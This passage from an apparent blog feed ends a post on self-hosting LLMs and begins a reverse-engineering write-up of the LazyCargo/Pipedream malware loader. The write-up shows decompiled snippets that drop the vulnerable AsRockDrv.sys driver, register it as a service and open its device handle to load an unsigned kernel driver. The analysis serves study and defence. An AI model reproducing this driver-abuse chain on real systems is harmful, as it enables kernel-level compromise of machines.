4-bit. This allows you to fit a massive model into a smaller vRAM footprint while keeping the \u0026ldquo;smart\u0026rdquo; parts sharp.\nActivation-Aware Quantization (AWQ) While GGUF is king for Apple Silicon and CPU inference, AWQ (Activation-aware Weight Quantization) has become the standard for high-performance GPU serving. The breakthrough of AWQ was the realization that you shouldn\u0026rsquo;t just look at the weights to decide what to compress, you should look at the activations.\nDuring quantization, AWQ feeds a small amount of calibration data into the model to identify which weights actually \u0026ldquo;light up\u0026rdquo; or activate most during inference. It identifies the 1% of salient weights that are crucial for performance and protects them, keeping them in higher precision or scaling them differently, while aggressively compressing the other 99%. This results in models that are significantly faster and more accurate than older methods (like GPTQ) because they preserve the specific pathways the model uses to think, rather than just the static weight map.\nKV Cache Quantization Finally, we have the new frontier: KV Cache Quantization. Traditionally, even if you compressed your model weights to 4-bit, the runtime memory (the context window) was still stored in massive FP16. For a long conversation, this temporary memory could easily grow larger than the model itself. New techniques now allow us to quantize this temporary cache into FP8 or even INT4. 
This creates a slight degradation in \u0026ldquo;recall\u0026rdquo; (the model might forget a specific detail from 100 pages ago), but it allows for massive context windows, effectively letting you fit a 128k token context into the same space that used to hold only 8k.\nTool Aware Models If standard LLMs are the \u0026ldquo;brains\u0026rdquo; that think and reason, Tool-Aware (or Function-Calling) models are the brains connected to the hands. A standard base model is effectively trapped in a text-only box. It can tell you how to check the weather, but it cannot actually check it. Tool-aware models bridge this gap, transforming the LLM from a passive chatbot into an active agent that can interact with your operating system, APIs, and local files.\nThe Mechanism: Function Calling At a technical level, \u0026ldquo;using a tool\u0026rdquo; is really just a structured game of fill-in-the-blanks. When you load a tool-aware model, you don\u0026rsquo;t just send it a user prompt; you also send it a list of available functions (tools) defined in a schema (usually JSON via MCP).\nFor example, you might provide a tool definition for get_current_weather(location: string). If you ask the model, \u0026ldquo;What\u0026rsquo;s the weather in Paris?\u0026rdquo;, a standard model would hallucinate an answer or say, \u0026ldquo;I don\u0026rsquo;t know.\u0026rdquo; A tool-aware model, however, detects that the user\u0026rsquo;s intent matches one of its available tools. Instead of generating conversational text, it flips a switch and generates a Structured Output, typically a JSON block looking like {\u0026quot;function\u0026quot;: \u0026quot;get_current_weather\u0026quot;, \u0026quot;parameters\u0026quot;: {\u0026quot;location\u0026quot;: \u0026quot;Paris\u0026quot;}}.\nThe Agentic Loop It is important to understand that the model itself does not run the code. It simply writes the request. The \u0026ldquo;magic\u0026rdquo; happens at the orchestration layer (the software running the model, such as Ollama, vLLM, or LangChain).\nReasoning: The model analyzes the prompt and decides it needs external data. It outputs the specific \u0026ldquo;Tool Call\u0026rdquo; token and the JSON command. Execution (The Pause): The inference engine detects this stop token, pauses the model generation, and takes that JSON payload. It executes the actual Python script or API call on your machine. Observation: The engine takes the return value of that function (e.g., \u0026ldquo;Temp: 15°C, Rainy\u0026rdquo;) and feeds it back into the model\u0026rsquo;s context window as a \u0026ldquo;Tool Result.\u0026rdquo; Response: The model \u0026ldquo;wakes up,\u0026rdquo; sees the result of the tool it requested, and uses that new fact to generate the final answer for the user. Key Distinction: While you can prompt almost any model to output JSON, true Tool Aware models (like Llama 3.1, Hermes, or Command R) are fine-tuned specifically on massive datasets of function interactions. They are significantly less likely to hallucinate nonexistent parameters or to mess up JSON syntax, which is critical for building reliable automated workflows.\nArchitectures: Dense vs. Mixture of Experts (MoE) The architecture of a model determines how efficiently it turns raw parameters into intelligence. Dense Models, like Llama 3 or GPT -3, represent the traditional approach to AI architecture. In these models, every single parameter is active for every single token generated. 
It is effectively a brute-force method in which the entire neural network is used to answer even the simplest query. While this ensures consistency, it comes with a steep cost in compute and memory bandwidth, as your hardware must move the entire weight set through the GPU cores for every word produced.\nMixture of Experts (MoE) models, such as Mixtral, Qwen, or DeepSeek, introduce sparsity to address this efficiency problem. Instead of a single, monolithic neural network, the model is split into smaller subnetworks, known as \u0026ldquo;experts.\u0026rdquo; A router layer sits at the front of the process, analyzing each token and activating only the specific experts needed for that concept, perhaps one expert for syntax and another for factual recall. This architecture creates a massive disconnect between file size and run cost. An MoE might have 47 billion total parameters on disk, but only use 13 billion active parameters during inference. This gives you the broad knowledge base of a massive model with the speed and responsiveness of a much smaller one.\nThe Impact of Size and Scaling Laws When we talk about model size, we are really talking about the capacity for complexity. Parameters function as storage slots for patterns, and the number of parameters dictates how deep those patterns can go. Smaller models, typically under 10 billion parameters, have sufficient capacity to master English grammar, basic facts, and surface-level instruction-following. They are excellent for summarization but often lack the depth to handle multi-step logic without losing the thread of the conversation.\nAs you scale up to the 30B and 70B parameter range, you start to see emergent behaviors in reasoning. This is the threshold at which models move beyond simple pattern matching and begin to understand nuance, solve logic puzzles, and handle complex coding tasks with significantly fewer hallucinations. They can maintain a coherent train of thought over much longer conversations. Once you push past the 100B parameter mark, the model gains deep world knowledge and the ability to generalize across domains it wasn\u0026rsquo;t explicitly trained on, though this comes with the hardware cost mentioned earlier.\nModel Specializations It is also critical to understand that not all models are trained for the same purpose. The raw output of a training run is called a Base Model. These are not chatbots; they are text completion engines designed to predict the next word in a sequence. If you ask a base model a question, it is just as likely to generate five more questions as it is to answer you, because it views the input as a pattern to be continued rather than a query to be resolved. These are generally useless for standard chat applications but are the preferred foundation for researchers fine-tuning their own datasets.\nFor almost all practical applications, you will want an Instruct or Chat model. These are base models that have undergone Reinforcement Learning from Human Feedback (RLHF) to understand the \u0026ldquo;User asks, Assistant answers\u0026rdquo; dynamic. Beyond standard chat, we are now seeing the rise of Reasoning Models (like DeepSeek R1), which are trained with Chain of Thought data to \u0026ldquo;talk to themselves\u0026rdquo; and error-check their logic before responding, and Coding Models, which are fine-tuned on massive repositories of code to understand syntax and edge cases that general models often miss.\nSummary Models are very complex. There are dense models and a mixture of expert models. 
Quantization is just shrinking models to fit on worse hardware without losing too much of the model\u0026rsquo;s ability. The model is really just a bunch of weights and some instructions on what they mean or how to work with them. There is not one format for models to be stored, quantized, built, or run.\nInference Engine So far the hardware that runs the models and the models themselves have been explained (mostly). The inference engine is what ties the two together. It is responsible for running the model at the software level. Inference engines are responsible for loading the model, managing memory, scheduling requests, and executing the actual matrix multiplications. All the speed tricks in the models and on the hardware only pay off if the inference engine is able to use them.\nWorkflow Execution To run a model the inference engine needs to follow several steps to go from input prompt to output.\nLoad the model from disk into memory if it is not already there. Tokenization: convert your input text into tokens, i.e., turn text into numbers. Prefill: builds the initial KV cache from your prompt; computationally heavy, but it only happens once. Decode: this is the generation part; the engine loops, generating one token at a time. Detokenization: takes the generated tokens and turns them back into words.\nMemory Management One of the optimizations when it comes to memory management is Paged Attention. The problem it solves is KV cache allocation: instead of setting aside one large contiguous space in vRAM, it allocates the cache in small blocks, making allocation dynamic and granular and letting the context grow on demand. This leads to much less wasted space if you have multiple queries running simultaneously.\nWith this you also gain more throughput by having more granular control. If one part of the process finishes first, the memory can be freed up for the next step instead of waiting for the whole section to complete before moving on. This really only matters when multiple requests run simultaneously, although with more agentic workflows that is the reality of what is happening under the hood. That process is called Continuous Batching, and it requires Paged Attention to work.\nAnother benefit of Paged Attention is memory sharing. If you ask the LLM to come up with multiple solutions, the inference engine can store the prompt tokens in one place and reuse them for every iteration, saving a large amount of space. Likewise, if you want the LLM to try different options, the different branches can share their common context the same way via a process called Beam Search. If a branch needs to change part of the shared KV cache, only the block that differs is copied while the rest stays shared, which again saves a large amount of space.\nParallelism This is the process of splitting up the model across multiple GPUs. When done correctly this gives you more compute and memory bandwidth, making the process faster, while also giving you more space to fit a model in the fast vRAM of the combined GPUs. For the most part there are two types of parallelism: tensor parallelism and pipeline parallelism.\nTensor Parallelism essentially splits each of a model\u0026rsquo;s layers across multiple GPUs. This method allows all the compute power of the GPUs to work on the same step of the inference process at the same time. In this process all the GPU cores need to sync back up between each layer.
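A minimal NumPy sketch of that split (two GPUs faked as two slices of the same matrix; the final addition is exactly what a real all-reduce has to synchronize):
import numpy as np

x = np.random.randn(1, 4096)             # activations for one token
W = np.random.randn(4096, 4096)          # one layer's weight matrix

# Split the weight matrix (and the matching slice of x) across two "GPUs"
W0, W1 = W[:2048, :], W[2048:, :]
x0, x1 = x[:, :2048], x[:, 2048:]

partial0 = x0 @ W0                       # computed on GPU 0
partial1 = x1 @ W1                       # computed on GPU 1

y = partial0 + partial1                  # the sum that must be synced across devices
assert np.allclose(y, x @ W)
In a real engine the two partial matmuls run on separate devices, so that final addition is a cross-GPU communication step, which is why interconnect bandwidth matters so much here.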
The math that is actually split is the matrix multiplication itself; the summing of the partial results is what needs to be synced across all the cores. This means that high bandwidth is critical, as there is a lot of communication between the chips. The pro of this setup is single-user generation speed; the con is that you need very fast interconnects to keep all the GPUs saturated.\nPipeline parallelism splits the model vertically between GPUs, meaning different layers live on different GPUs. The reason to do this is when you need to fit a model that won\u0026rsquo;t fit on one GPU and the bandwidth between the GPUs is not great. The trade-off is that only one GPU is actually working at a time, but it greatly decreases the amount of communication the GPUs need to do to function together.\nIn data centers both are used in conjunction: tensor parallelism links the GPUs within a rack, and pipeline parallelism links different server racks together.\nHardware Translator The model files just contain the weights, but the hardware needs instructions on what to do with those numbers. The inference engine contains the pieces of code that know how to interact with the hardware drivers and tell the GPU how to compute the results. This means that the inference engine has to know the best way to utilize the hardware it is running on in order to get the best results, as hardware differs.\nThe optimizations that can be made here are mainly about which instructions the engine sends to the GPU, and the best choice depends on every aspect of the hardware being used. So getting the inference engine to run optimally requires a lot of testing and research into which instructions work best for the hardware currently in use. The brand of hardware also changes what functions are available.\nParameters While each inference engine has different parameters, there are some general controls that are good to know exist. There are two general categories: load-time parameters, which control how the model is loaded into the hardware and how memory is handled, and runtime/sampling parameters, which control the behavior of the output.\nFlags for these parameters differ depending on the engine, so I am not going to list specific flag names.\nFor load-time parameters, one of the main ones to work with is the flag that controls the offloading or splitting of the model across the hardware. These flags are what you use to control how the parallelism is set up. Another parameter controls the context window and memory reservation. The KV cache takes up a lot of space and grows linearly with context, so you might have to limit the max context size, or increase it from the defaults if the hardware and model can handle it. You can also control the maximum amount of memory that can be allocated, depending on how dangerous you want to play it. There is also the option to shrink the KV cache by effectively quantizing it to a smaller precision.
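To see why the context window is the load-time parameter that bites people, here is a rough back-of-the-envelope sketch (the layer and head counts are illustrative, roughly 7B-class; real engines add their own overhead):
# Rough KV cache size: 2 (K and V) * layers * kv_heads * head_dim * bytes * tokens
layers, kv_heads, head_dim = 32, 32, 128       # illustrative 7B-class values
bytes_per_value = 2                            # FP16; drops to 1 with FP8 cache quantization

def kv_cache_bytes(context_tokens):
    return 2 * layers * kv_heads * head_dim * bytes_per_value * context_tokens

for ctx in (4_096, 32_768, 131_072):
    print(ctx, round(kv_cache_bytes(ctx) / 2**30, 1), "GiB")
With these numbers a 4k context already costs about 2 GiB, and a 128k context costs about 64 GiB, which is why cache quantization and context limits matter so much.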
Runtime parameters are less about controlling performance and more about improving the output quality. An important parameter here is called temperature, which effectively controls the randomness of responses: the higher the temperature, the more \u0026ldquo;creative\u0026rdquo; the model becomes. Nucleus Sampling is another flag; it enables a process that lops off the less probable options, and another version of it simply ignores tokens that fall below a specified probability. Another section of runtime parameters controls the response structure. One of them is a limit on the number of tokens one request will generate. You can also add penalties to stop looping situations with smaller models. Depending on the model this might not be a good choice, as it might need to repeat itself internally for longer thinking, but it can be helpful on occasion.\nThose are some of the general areas of control that you have access to, although there are a lot more, and depending on the engine there might be unique parameters. The bottom line is that the parameters are where almost all the optimization comes in once you have settled on hardware.\nLandscape of Inference Engines There are a lot of different inference engines that are free to use, with the main ones being llama.cpp, vLLM, MLX, and TensorRT-LLM. Each of them has different uses and optimizations.\nllama.cpp is the general worker that is built to run on all types of systems and hardware. It is the backend inference engine for Ollama, the common self-hosting tool that handles downloading models and other useful features. llama.cpp is also designed to run on consumer hardware, i.e., the cheaper end of the spectrum where there are fewer of the hardware tricks in place. An important thing to note is that this inference engine runs GGUF models (the creator of llama.cpp also created GGUF). Because it is made to run on consumer hardware, it has a lot of features for sharding the model across the GPU and CPU. It has compatibility with Apple\u0026rsquo;s Metal API, NVIDIA\u0026rsquo;s CUDA drivers, AMD drivers, and AVX-512 instructions. With this in mind, llama.cpp is one of the best choices regardless of what hardware is available.\nvLLM is an inference engine for better hardware. It runs AWQ / GPTQ / FP8 models and came up with Paged Attention. It also has great support for tensor parallelism, as it is designed for much more compute than llama.cpp is focused on. Because it targets more enterprise-grade equipment, it also has tool calling built into the engine, with some very complex workflows that allow vLLM to run multiple tool calls simultaneously, streamlining some processes. A feature of vLLM is that, through some witchcraft, it can store the KV cache in RAM instead of in vRAM, allowing massive context windows to run with limited speed degradation. One thing that vLLM doesn\u0026rsquo;t do well is offload weights to the CPU, as that is not a focus for the tool.\nMLX is the inference engine developed by Apple\u0026rsquo;s machine learning team specifically to run LLMs on Apple hardware. This means, for the most part, that if you have Apple silicon this is the best option, as it takes advantage of some hardware specifics. The main one is the unified memory architecture that I talked about briefly in the hardware section. Because the CPU and GPU use the same memory, there is no need to copy data from CPU to GPU; the CPU just hands the GPU the location of the data, so there is significantly less copying overall. It also uses something called lazy evaluation, which essentially means that instead of immediately calculating results it waits until the output is actually needed. This gives the engine more time to combine the instructions it sends to the hardware, drastically reducing overhead on the GPU and keeping it more saturated for faster results. Then there is the fact that MLX utilizes all the hardware to get the best results, so the GPU, CPU, and ANE all get used.
Another thing this inference engine has is the ability to train or fine-tune models for your use cases, which I am not going to cover here as that is a whole other can of worms I am still exploring.\nTensorRT-LLM is the MLX for NVIDIA. It is designed to be very fast. If you have NVIDIA GPUs that can run it, do. The quick overview is that it takes in the model and then optimizes it for whatever hardware you have through Automatic Inference Optimization and Layer Fusion. Through Graph Rewriting and Specialized Precision Handling it is able to change the model to run best on your setup in a pre-compilation phase. It also has great support for tensor parallelism and communication between GPUs. This is the inference engine used in NVIDIA-based data centers for running cloud AI. It only runs on NVIDIA hardware.\nTo summarize, the inference engine is responsible for the running and operation of the model. This is where the optimizations happen in self-hosting, because the right engine can use the hardware to the greatest effect.\nMCP \u0026amp; RAG Both MCP and RAG are tools you can add to your setup to enhance capabilities and improve results. MCP is a standard protocol that enables your LLM to operate within a system. RAG is a system for giving your model more context about the situation related to the prompt. Putting them together can lead to the best results when you want an LLM to understand the specific problem, be able to use tools outside itself, and make changes.\nMCP Components The MCP client is the component built into the chat interface that interacts with the LLM. The client\u0026rsquo;s job is to inform the LLM about the available tools, actually call the tool the LLM wants to call, and, if any information comes back from that call, inform the LLM of the output. It does this by simply inserting text into the prompt after you hit Enter, before it reaches the LLM. This text informs the LLM how to call tools; normally, the LLM outputs the text in a tool-call format, e.g., tool_get_data(). Depending on the tool used, the client then forwards the call to the MCP server. If the server has a response, it injects that text data into the LLM\u0026rsquo;s context window, effectively giving it new knowledge.\nMCP servers\u0026rsquo; job is to wrap a tool so it\u0026rsquo;s easy for the LLM to interact with. The server is an API for the LLM to use as a tool. When building them, remember to do so in a way that best suits the LLM (not in the standard API format). When the MCP client sends the request to the server, the server\u0026rsquo;s job is to run the requested command or function and then send the results back to the client to be injected into the LLM. This is the component that you configure when setting up MCP.\nThe integration of the client, MCP server, and inference engine changes a little if the model is tool-aware, as it might put the data in a separate context window, but that is handled by the inference engine.\nMCP Best Practices Here are some things to consider when working with MCP servers. First, for most tools, there is already an MCP server available for you to use. I recommend running it through MCP-scan or proximity to make sure you are not installing malware. Additionally, many of them are not very good, and depending on what you want from the tool, it may be easier to build your own for the specific task you want the LLM to perform. If that is the case, keep these things in mind (a small sketch follows below). Expose outcomes, not operations. Make it as simple as possible for the LLM to get the job done or the data it needs; this means creating higher-level tools that do more than a standard API function. Limit the tools you expose, as the more tools you have, the more of the context window they take up. Ensure parameters are flat, simple data types (strings and other primitives) so that the LLM has less of a chance to make a mistake when calling the tool. Constrain variables to enums so that the LLM has less chance of messing up the tool call. Use the docstrings of the functions to explain what the tool does in a way that an LLM can understand. Make sure errors return more context than just an error code, so the LLM can better understand what went wrong. Lastly, one of the most important things is to curate the data returned: return only the relevant data instead of dumping massive amounts of JSON. Also, security-wise, make sure that you have limitations on what the AI can do so that it doesn\u0026rsquo;t accidentally delete your system.
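Here is a minimal, framework-agnostic sketch of those guidelines (the ticket tool, its fields, and the fake backend are all hypothetical; the real MCP SDKs generate the tool schema from code like this, so treat it as the shape of a good tool rather than working server code):
from dataclasses import dataclass

@dataclass
class Ticket:
    id: int
    title: str
    age_days: int
    status: str

# Hypothetical stand-in for whatever system the tool wraps
_FAKE_DB = [Ticket(1, "printer on fire", 2, "open"), Ticket(2, "vpn fixed", 30, "closed")]

def list_tickets(status: str, limit: int = 10) -> dict:
    """List support tickets. status must be one of: open, closed.
    Returns at most limit tickets with only id, title, and age_days."""
    if status not in ("open", "closed"):
        # Rich errors: tell the model what went wrong and what would be valid
        return {"error": f"unknown status '{status}'; expected 'open' or 'closed'"}
    rows = [t for t in _FAKE_DB if t.status == status]
    # Curated output: only the fields the model actually needs, never the whole record
    return {"tickets": [{"id": t.id, "title": t.title, "age_days": t.age_days} for t in rows[:limit]]}

print(list_tickets("open"))
The parameters stay flat, the valid values are enumerated in the docstring, the error explains itself, and the return value is trimmed to what the LLM needs.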
MCP Primitives Tools are the most well-known primitive in MCP servers. The server defines a tool with a name, description, and input schema (parameters). The LLM analyzes the description and, if it decides the tool is helpful, generates a call with the necessary arguments. The model chooses when to call them.\nResources are just documents that provide context to LLMs. This is defined information you might want to bring in when working with MCP, and it can act similarly to skills in Claude Code. The purpose is to provide the model with background information, logs, or file contents needed to answer a question. The front end chooses when to call them.\nPrompts are templates or workflows that you can define in your MCP server for users to call. The goal is to help users use the server effectively by providing pre-built instructions or standard operating procedures. If you find that prompting the LLM in a specific way gets the best results with a specific tool, you could add a prompt resource to speed up that process.\nTasks exist in some MCP servers; they are essentially a structure that goes beyond a prompt and is meant for long-running, complex multi-step workflows. Tasks allow for tracking progress, pausing/resuming execution, and managing durable workflows.\nWhat is RAG? Retrieval-Augmented Generation (RAG) is a technique that enhances the accuracy and reliability of LLMs by retrieving relevant data from an external knowledge base before generating a response. This helps address the AI\u0026rsquo;s lack of knowledge about the specific topic you\u0026rsquo;re discussing by augmenting the LLM\u0026rsquo;s context window with relevant information.\nThe typical RAG workflow involves passive retrieval followed by generation:\nQuery: The user asks a question. Retrieval: The system searches a specific knowledge base for relevant text chunks. Augmentation: The retrieved text is combined with the original question into a single prompt. Generation: The LLM generates an answer based on the provided facts rather than its training data.\nHow does RAG work? The magic of RAG is in the retrieval process, which has to know what is relevant to your prompt. The first step is to convert both the source data and the prompt into a representation called embeddings. The embeddings are essentially dense semantic vectors that capture the meaning of each data point.
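A toy sketch of the retrieval step (the 4-dimensional embeddings here are made up; a real system would get them from an embedding model and store them in a vector database):
import numpy as np

# Hypothetical pre-computed embeddings for three documents (real ones have hundreds of dims)
docs = ["reset the VPN", "rotate the API keys", "office coffee machine manual"]
doc_vecs = np.array([[0.9, 0.1, 0.0, 0.2],
                     [0.1, 0.8, 0.3, 0.0],
                     [0.0, 0.1, 0.9, 0.7]])

query_vec = np.array([0.85, 0.15, 0.05, 0.1])   # made-up embedding of a question about the VPN

# Cosine similarity: closest meaning wins, not closest wording
scores = doc_vecs @ query_vec / (np.linalg.norm(doc_vecs, axis=1) * np.linalg.norm(query_vec))
best = int(np.argmax(scores))
print(docs[best], scores.round(2))               # the chunk that gets injected into the prompt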
This allows semantic matching instead of just text matching, giving far better results.\nThere is a vectorized database of information you want the LLM to have available. Whenever a prompt is sent to the LLM, the RAG system will semantically vectorize the input and look for close matches in the database. Depending on the setup parameters, the results are then uploaded to the model\u0026rsquo;s context as data.\nAutomation There are several automation tools to help with building more agentic workflows. n8n is one of the leading general-purpose tools that allows you to build complex workflows with multiple LLMs working together. n8n allows you to build a decision matrix for a path that allows the LLM to choose what to do within the outlined options. This tool also allows different models to interact, allowing for the specialties of each model to be applied to the greatest effect. n8n can also be run with Docker, making it really easy to spin up and set up a test workflow. n8n is the general workhorse, so great for testing but not for optimization.\nLangGraph is another tool in the category of thinking tools. It creates a complex graph-based stateful multi-agent workflow, utilizing each model to its fullest. This tool is ideal for processes that require extensive thought.\nGumloop falls into the category of automation tools designed for high-volume, data-intensive processes. It moves large amounts of data across SaaS apps and supports MCP- and natural-language-based workflow building. Not a total fan, but it does a good job of handling a lot of data.\nThere are many other orchestration or automation tools out there that help build better, more advanced agentic workflows. Just give it a Google. I have not spent too much time picking these for my setup or researching them.\nOther Tooling LM Studio: Front end that can use either llama.cpp or MLX exo: clustering orchestrator to speed up results (Would use if clustering) openwebui: chatgpt-like interface for interacting with inference engine (what I use) opencode: terminal-based front end that has lots of cool features (what I use) Summary There are a lot of moving parts that, when done right, can all come together to deliver massive performance benefits. The largest improvements in speed or the ability to run larger models come from the hardware, but the software on top needs to leverage the specific tricks in each setup to achieve those results. The information I covered here is important for the next steps: picking the best options now, with knowledge of what to look for when running local LLMs.\n","permalink":"https://blog.lukasmay.com/deep-dives/ai-stack-part-1/","summary":"\u003ch1 id=\"overview\"\u003eOverview\u003c/h1\u003e\n\u003cp\u003eI have been looking into self-hosting LLMs, and this is my attempt to put everything I\u0026rsquo;ve learned about the subject in one place (so I can stop forgetting things). Alongside that, I wanted to include information about the setup I use to self-host LLMs on my laptop and the steps I took to build and optimize it. While that will come in the future, as there are still some things I am changing, and this is long enough already, I removed some of those parts to put in the next section.\u003c/p\u003e","title":"AI Stack Part 1"},{"content":"Introduction This is meant to be an outline of what I found while reversing the LazyCargo malware sample. 
This malware sample is one part of the five pipedream/INCONTROLLER malware framework components discovered by several cybersecurity firms and government agencies. The LazyCargo malware is a Windows dropper for another module in the framework. I don\u0026rsquo;t have access to any of the other components, so I wrote a payload to run the LazyCargo malware at the end of the analysis to verify my findings from the static analysis.\nI am going to skip a lot of the background on the pipedream malware framework, as this post is focused on LazyCargo, but I would recommend looking into the other components, as pipedream is the seventh known ICS-specific malware ever discovered, and lots of cool things are happening in the other components. I will first explain at a high level what LazyCargo does and then perform a walkthrough with code snippets of what I found inside the module finishing off with how I got the malware to run on a windows system with a custom payload.\nWhat LazyCargo Does LazyCargo is a Windows malware loader. It takes a payload and makes it run in ring 0 or in kernel space instead of user land. The way it goes about setting that up is with the mechanism Bring your own vulnerable driver (BYOVD). This is used to essentially create a vulnerability in the system by adding vulnerable software that operates in ring 0. Windows is smart enough to not let random code operate in ring 0 and for Windows to load a driver it has to be trusted or in other words signed. So the solution to this problem is find a signed driver that Windows will trust that is vulnerable so the operating system will load vulnerable code into ring 0. The next step in the attack chain is to then exploit the vulnerability in the newly loaded driver which in this case was AsRockDrv.sys which has this vulnerability: CVE-2020-15368.\nSo the exploit chain so far is to first to load the AsRockDrv.sys driver. Then register the driver with the system which starts the driver as a system service. The final step in that chain is to exploit the vulnerability which allows the malware to load the payload into ring 0 giving the payload kernel level permissions. There are lots of smaller steps that LazyCargo takes to make each of these things happen but that is the general overview of what and how it operates.\nStatic Analysis Initial Findings To start off with I ran the binary through string sifter which is a tool that uses floss to extract all the strings from a binary and then reorders them based on relevance to malware reverse engineering making the process of getting relevant strings much quicker.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 c:\\asrock\\work\\asrocksdk_v0.0.69\\asrrw\\src\\driver\\src\\objfre_win7_amd64\\amd64\\AsrDrv103.pdb C:\\Users\\User1\\Desktop\\dev projects\\SignSploit1\\x64\\Release\\AsrDrv_exploit.pdb Dhttp://crl.microsoft.com/pki/crl/products/MicrosoftCodeVerifRoot.crl0 2Terms of use at https://www.verisign.com/rpa (c)101.0, c:\\program files (x86)\\microsoft visual studio\\2017\\enterprise\\vc\\tools\\msvc\\14.16.27023\\include\\xmemory0 bcrypt.dll minkernel\\crts\\ucrt\\src\\appcrt\\string\\strnicmp.cpp C:\\AsRockDrv.sys \\REGISTRY\\MACHINE\\HARDWARE\\RESOURCEMAP\\System Resources\\Physical Memory \\Registry\\Machine\\System\\CurrentControlSet\\Control\\Class ntoskrnl.exe Here are some of the top strings that string sifter was able to find. Right off the bat it is clear that something is happening with the AsRockDrv.sys as it\u0026rsquo;s listed in several different strings. 
Next, there are repeated mentions of signing. bcrypt.dll is the Windows Cryptographic Primitives Library. ntoskrnl.exe is responsible for essential system services, including hardware virtualization, process management, memory management, and security reference monitoring. The registry keys also point to some sort of low-level operations. Overall, the main takeaway from a quick look at the strings is that something is happening with the AsRockDrv.sys driver, along with what look like components that will help load it.\nThe next tool I ran the binary through was capa. This tool essentially tells you the capabilities of a binary (highly recommended). For this analysis I will just show the default output and how helpful it is when starting to look at a binary file.\ncapa output (screenshot)\nATT\u0026amp;CK Tactics and MAEC Category This section maps the binary\u0026rsquo;s high-level execution flow to industry-standard threat frameworks, revealing its primary objective on the infected host.\nIt is a Launcher: The MAEC category explicitly identifies this binary as a launcher, meaning its core purpose is to deliver and execute a secondary payload rather than acting as the final stage itself. Service-Based Persistence: It ensures it survives system reboots by establishing persistence through the creation and modification of a Windows Service. Evasive Execution: It attempts to fly under the radar by utilizing obfuscated files and executing its processes through system services.\nMalware Behavior Catalog (MBC) The MBC breakdown highlights the specific technical behaviors the malware uses to interact with the system, modify files, and evade automated analysis.\nAnti-Debugging: The binary actively tries to detect if it is being analyzed by using timing and delay checks (specifically GetTickCount) to identify debuggers. Cryptography: It contains routines to encrypt and decrypt data, strongly suggesting the secondary payload or its configuration is encrypted within the file. System Reconnaissance: It actively queries the registry and searches for specific files and directories to understand its environment before deploying its payload.\nDetailed Capabilities This detailed list exposes the exact, low-level functions compiled into the binary, giving us a direct roadmap of its internal mechanics.\nEmbedded Payload: The scan confirms the presence of an embedded PE (Portable Executable) file, verifying exactly what the launcher is hiding. BCrypt Usage: It specifically relies on the BCrypt API to handle its data encryption and decryption routines. Debug Info: The binary is compiled in debug mode, exposing the developers\u0026rsquo; original local file paths, internal logging, and potentially the original source code structure, which explains why the strings pass was as rewarding as it was. Dynamic API Loading: It links functions at runtime, a technique used to hide the true APIs it relies on from basic static analysis tools.\nAt this point I had enough information about what might be happening inside the binary to open it in Ghidra.\nMapping Control Flow The next step was to figure out how everything I had found up to this point was linked together. So I found the main function and started looking at the decompiled code to see what control logic was in place.\nNOTE: I have already gone through and renamed labels in Ghidra.\n1. Ingesting the Malicious Payload The malware expects an argument (the unsigned driver) upon execution.
It immediately opens this file, calculates its size, allocates memory, and reads the malicious payload into a buffer in user-space.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 // Ensures an argument is passed if (argc \u0026lt; 2) { printf(\u0026#34;please set unsigned driver as argument to program!\\n\u0026#34;); goto LAB_END; } // Loads the target file (the unsigned driver) HVar2 = OpenFile(*(LPCSTR *)(argv + 8), local_528, 0); hFile = (HANDLE)(longlong)HVar2; // Checks how big the file is and reserves RAM file_size = GetFileSize(hFile, (LPDWORD)0x0); vector_resize((longlong *)\u0026amp;UnsignedDriver_Vector, (ulonglong)file_size); // Copies data from disk to reserved RAM ReadFile(hFile, UnsignedDriver_Data, ...); Takeaway: The malware doesn\u0026rsquo;t contain the ultimate payload hardcoded within itself; it expects to load it dynamically from disk. This modular approach allows the attacker to swap out different malicious drivers without recompiling the loader.\n2. Dropping the Stepping Stone (The Vulnerable Driver) Once the malicious payload is in memory, the malware drops a second file to disk: a known vulnerable AsRock driver (AsRockDrv.sys). It writes this file directly from a hardcoded byte array (DAT_driver - bytes) embedded within the executable.\n1 2 3 4 5 6 7 // This creates the vuln Driver from the code of the payload _File = fopen(\u0026#34;C:\\\\AsRockDrv.sys\u0026#34;, \u0026#34;wb\u0026#34;); if (_File == (FILE *)0x0) { ... } // Writes the vulnerable driver to the C: drive fwrite(\u0026amp;DAT_driver-bytes, 0x8708, 1, _File); fclose(_File); Takeaway: This is the core of the BYOVD technique. Because AsRockDrv.sys is likely a legitimately signed driver (despite containing security flaws), Windows will allow it to be loaded into the kernel without triggering Driver Signature Enforcement (DSE) alerts.\n3. Establishing a Kernel Foothold With the vulnerable driver dropped to disk, the malware uses the Windows Service Control Manager to register it as a system service, start it, and then open a handle to communicate with it directly.\n1 2 3 4 5 6 7 8 9 10 // Start of the driver registration with windows hSCManager = OpenSCManagerW((LPCWSTR)0x0, (LPCWSTR)0x0, 2); hService = CreateServiceA(hSCManager, \u0026#34;AsRockDrv\u0026#34;, \u0026#34;AsRockDrv\u0026#34;, 0xf01ff, 1, 2, 1, \u0026#34;C:\\\\AsRockDrv.sys\u0026#34;, ...); // Loads the driver into the kernel BVar3 = StartServiceW(hService, 0, (LPCWSTR *)0x0); // Opens communication line via device symlink hDevice_AsRock = CreateFileW(L\u0026#34;\\\\??\\\\AsrDrv103\u0026#34;, 0xc0000000, 7, ...); Takeaway: The malware has successfully transitioned from user-space execution to having a functional, trusted communication pipeline (\\\\??\\\\AsrDrv103) directly into the Windows kernel.\n4. Payload Assembly and Exploitation This is where the actual exploit occurs. The malware concatenates a shellcode header with the unsigned driver it read in Step 1. 
